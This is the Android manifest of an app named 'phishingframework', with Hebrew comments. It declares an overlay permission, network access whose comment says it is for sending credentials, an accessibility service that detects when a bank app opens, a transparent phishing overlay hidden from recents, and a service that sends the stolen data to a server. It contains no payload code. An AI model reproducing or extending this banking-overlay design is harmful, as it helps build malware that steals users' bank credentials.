<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.phishingframework"
    xmlns:tools="http://schemas.android.com/tools">

    <!-- מאפשר הצגת Overlay מעל אפליקציות אחרות -->
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

    <!-- גישה לרשת (שליחת credentials) -->
    <uses-permission android:name="android.permission.INTERNET" />

    <application
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.PhishingFramework"
        tools:targetApi="31"
        android:networkSecurityConfig="@xml/network_security_config">

        <!-- מסך ראשי של האפליקציה -->
        <activity
            android:name=".MainActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <!-- השירות שמזהה את פתיחת אפליקציית הבנק -->
        <service
            android:name=".PhishingAccessibilityService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:exported="false">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service_config" />
        </service>

        <!-- ה-Activity השקופה שמציגה את מסך הפישינג -->
        <activity
            android:name=".PhishingOverlayActivity"
            android:theme="@style/OverlayTheme"
            android:exported="false"
            android:excludeFromRecents="true"
            android:taskAffinity=""
            android:launchMode="singleTop"
            android:windowSoftInputMode="adjustResize|stateVisible"/>

        <!-- השירות ששולח את המידע לשרת -->
        <service
            android:name=".CredentialSendService"
            android:exported="false" />

<!--        <activity-->
<!--            android:name=".CaughtActivity"-->
<!--            android:exported="true"-->
<!--            android:theme="@style/Theme.PhishingFramework" />-->

    </application>

</manifest>
